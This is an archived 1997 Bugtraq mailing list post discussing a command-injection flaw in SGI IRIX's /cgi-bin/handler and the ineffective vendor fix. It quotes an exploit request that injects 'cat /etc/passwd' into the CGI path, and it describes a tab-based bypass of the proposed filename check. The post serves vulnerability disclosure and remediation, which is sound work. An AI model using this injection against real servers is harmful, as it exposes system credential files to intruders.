Bugtraq mailing list archives
Re: /cgi-bin/handler - more notes
From: mouse () RODENTS MONTREAL QC CA (der Mouse)
Date: Fri, 20 Jun 1997 15:37:02 -0400
I have had reports that my exploit for SGI's /cgi-bin/handler does not work on IRIX 6.3 (on O2). I analyzed the code provided with IRIX 6.3 and they tried to fix it, but they actually DID NOT.
telnet target.machine.com 80 GET /cgi-bin/handler/whatever;cat /etc/passwd| ?data=Download HTTP/1.0
[...To fix this right...] All "open" commands should check if the their argument is really a filename. You could use:
-f $doc && open (INPUT, $doc)
If you have untrusted local users who can install their own cgi-bin stuff (I know of at least one large site that is in this situation), this isn't enough. /cgi-bin/handler/whatever;cat\t/etc/passwd\|\t may well exist, and open() will _still_ take it as a pipe.
So far, IRIX versions 5.3, 6.2, and now 6.3 are vulnerable. Anyone on IRIX 6.4? :) (What does it run on BTW?)
I know of one site with an Octane that runs 6.4. I'd try this, but that site runs exactly one web server, and it ain't SGI's. I could turn on the web server on the Octane, I suppose, but I'm hesitant to mess with it.... der Mouse mouse () rodents montreal qc ca 7D C8 61 52 5D E7 2D 39 4E F1 31 3E E8 B3 27 4B
Current thread:
- Re: /cgi-bin/handler - more notes der Mouse (Jun 20)
- <Possible follow-ups>
- Re: /cgi-bin/handler - more notes Ariel Biener (Jun 20)